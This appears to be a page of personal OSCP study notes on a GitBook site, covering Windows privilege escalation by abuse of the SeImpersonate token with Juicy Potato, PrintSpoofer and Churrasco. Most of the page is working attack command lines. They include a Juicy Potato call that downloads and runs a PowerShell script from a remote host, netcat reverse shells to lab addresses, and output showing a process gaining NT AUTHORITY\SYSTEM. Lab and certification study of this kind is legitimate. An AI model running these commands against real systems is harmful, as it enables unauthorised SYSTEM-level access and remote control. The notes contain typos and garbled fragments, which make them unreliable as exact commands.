✍️
OSCP Prep
  • Welcome Aboard
  • Linux Basics
    • Command Line Fundamentals
  • Writeups
    • HackTheBox
      • Windows
        • Granny
        • Devel
        • Blue
        • Legacy
      • Linux
        • shocker
    • OSPG
    • TryHackMe
    • Vulnhub
      • Kioptrix Level1
  • Scanning and Enumeration
    • Index
    • Wordpress
      • wpscan
    • NMAP
    • DNS
    • NFS
    • DB
      • Oracle DB 1521
      • MySQL
    • SMB
      • msfconsole
      • crackmapexec
      • smbmap
      • smbclient
      • enum4linux
      • Mount smb share locally
    • SSH
    • HTTP
      • PUT Method
      • Untitled
  • Tools and Techniques
    • File Transfer
    • CMD-Fu
    • Cross Platform Exploit Compilation
    • Bash-Fu
    • Sniffing
      • tcpdump
      • Wireshark
    • Brute Force
      • Untitled
      • Hydra
    • Msfvenom
    • Password Cracking
      • John
      • Hashcat
  • Gaining Access and Exploitation
  • SQL Injection
    • sqlmap
    • mysql syntax
    • ms sql syntax
  • File Upload
  • LFI
  • Privilege Escalation
    • Windows
      • references links
      • Manual
        • SeTokenImpersonate
      • Scripts
    • Linux
      • Manual
        • Know your Enemy
      • Scripts
  • Mislu Tips
    • Troubleshooting
  • Buffer OverFlow under 30 min.
    • point n shoot
    • fuzzer.py
    • Addons reading material
  • Active Directory
    • Untitled
Powered by GitBook
On this page
  • How to Use Juicy Potato?
  • How to Use Churrasco?

Was this helpful?

  1. Privilege Escalation
  2. Windows
  3. Manual

SeTokenImpersonate

PreviousManualNextScripts

Last updated 3 years ago

Was this helpful?

How to Test ? whoami /priv if seimpersonate token enabled very old machines like before 2008 ,windows 2003 :: - chimmi churi , chuarsco latest andrecent 64 bit ::- printspoofer preccompiled in between these :: rotten potato, juicy potato etc. both for 32 as well as 64 bits then juicy potato / printspoofer etc. printspoofer only works for x64 architecture for x86 try juicy potato reference links :: pre compiled printspoofer exe x64: pre compiled juicy potato x86:

How to Use Juicy Potato?

Spawning a PS rev shell :: JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString(' -t * -c {69AD4AEE-51BE-439b-A92C-86AE490E8B30} -a for cli arguments u want to pass for -c flag you need (select your target os as per version and select any clsid , one by one try all see which one works) Try all of them one by one see which one works ::

JuicyPotato.exe -l 9999 -p c:\interpub\wwwroot\upload\nc.exe -a "IP PORT -e cmd.exe" -t t -c {B91D5831-B1BD-4608-8198-D72E155020F7} JuicyPotato.exe -l 1340 -p C:\users\User\rev.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334} JuicyPotato.exe -l 1337 -p c:\Windows\System32\cmd.exe -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} -a "/c c:\users\User\reverse_shell.exe"

Testing {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 1337 ...... [+] authresult 0 {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4};NT AUTHORITY\SYSTEM [+] CreateProcessWithTokenW OK

How to Use Churrasco?

churassco.exe -d "C:\Inetpub\wwwroot\nc.exe -e cmd.exe 10.10.14.15 5353" -d for command to run ^cmd simple one liner nc reve shell

https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/juicypotato
https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/privilege-escalation-abusing-tokens#seimpersonateprivilege-3-1-1
https://github.com/dievus/printspoofer
https://github.com/ivanitlearning/Juicy-Potato-x86/releases
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#eop---impersonation-privileges
https://www.puckiestyle.nl/token-impersonation/
http://10.10.14.18/psrvsh.ps1')"
https://github.com/ohpe/juicy-potato/tree/master/CLSID
https://github.com/Re4son/Churrasco/blob/master/ReadMe.txt